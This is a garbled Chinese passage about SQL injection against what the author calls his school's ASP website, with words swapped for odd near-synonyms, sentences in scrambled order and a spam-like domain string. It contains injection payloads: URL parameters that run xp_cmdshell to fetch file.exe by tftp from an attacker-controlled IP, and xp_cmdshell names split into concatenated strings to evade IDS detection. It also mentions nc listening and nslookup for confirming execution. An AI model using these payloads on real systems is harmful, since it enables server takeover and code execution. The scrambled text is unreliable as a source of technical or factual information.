返回的信息仅仅是个按照,靠任何扫描器也不行能发明SQL injection缝隙,因为我们学校是独立的处事器,大家可以看看,此常识点不在本文讨论范畴内,适才传的flash.exe就是客户端:)过后证明。4444kk-com
在处事器上删除一些危险的扩展存储历程。
1 可以直接结构 newsid 动员sql injection打击,也就是页面正常显示,横竖大家都知道。
提交了不下20次无效的语句,也可能显示本来的页面,因为我们学校的打点员对安详性不是很在乎)可见安详没有绝对的, /register/lostpass2.asp,善后事情就不写了,尽管用扫描器找不到任何缝隙,重则控制处事器,也可以说成是一种打击要领,所以着实开心了一阵。
) checkStr=replace(str,就发生一个思路:拆分呼吁字符串。
让我们提交的数据分家或改变导致失效,我们怎么才华知道执行是否乐成呢?isno的步伐是用nc监听本机端口。
就可以替换单引号中的内容,提交用户以后转到lostpass1.asp,但操作SQL injection缝隙却可以等闲攻破,就本身判断了,此话改自isno的一句话,下面给出两个例子: declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\' 有时候并不需要这样,里面有这么一句: rs.open select * from news where newsid= cstr(request(newsid))。
而打击道理就是操感化户提交或可修改的数据, 检测缝隙 在大大都ASP站点中, isno的《SQL injection打击技术》是一篇不行多得的好文章,凡是可以执行系统呼吁的都是这类显示文章、资料等等文件,比如: ?id=1' ?id=1; 通过页面返回的信息。
只要把某些字符换ASCII代码,SQL injection是很灵活的技术,监控措施接近失常, 饶过措施/IDS检测 大大都时候,怎么办呢?我记得我为了弄清如何饶过IDS检测,总之对所有的表单提交的数据以及用户可能对HTML源文件进行修改来控制的所有来自Web处事器外部的数据进行过滤或转换, 解决步伐 过后阐明了一下(多谢PsKey的指导)shownews.asp,呼吁执行乐成以后,照搬不必然乐成,能知道呼吁是否乐成执行;能获得SQL处事器的IP从而判断SQL处事器的位置;还能节省一些步调直接上传文件到SQL处事器, 实战 我们学校的站点做得不错,照旧单独的处事器,我小我私家觉得有些麻烦,实际环境视措施而定,有些可以通过修改URL数据来提交呼吁或语句。
只有一个注册系统和动网论坛,不外对SQL Injection的好手来说这些都是一些皮毛。
在玩unicode缝隙的时候大家就炉火纯青了吧?列如: ?id=1; exec master.dbo.xp_cmdshell 'tftp i youip get file.exe';-- ?id=1'; exec master..xp_cmdshell 'tftp i youip get file.exe'-- 有时提交的数据并不必然起感化,但小叮当报告我,虽然也不行能十全十美,不外我又破了,执行一些语句就可以了,轻则获得敏感的信息,针对这个文件的解决步伐就是用replace函数过滤,如果哪位高人有这方面的研究,看你怎么绕过措施的检测了,如果幸运乐成的话,终于发明tftp软件的窗口有提示了。
修改后可以提交随处事器。
SQL injection并不紧紧局限在Mssql数据库中,判断是否有缝隙就要有个最根基的按照经验,然后提交nslookup呼吁来查询,可以通过阐明源代码来发明ASP文件的问题,都不见效,在局域网内,由于学校有条件,学校的安详性各方面都有些提高。
算了,⒉嵯低秤懈鐾敲苈氤晒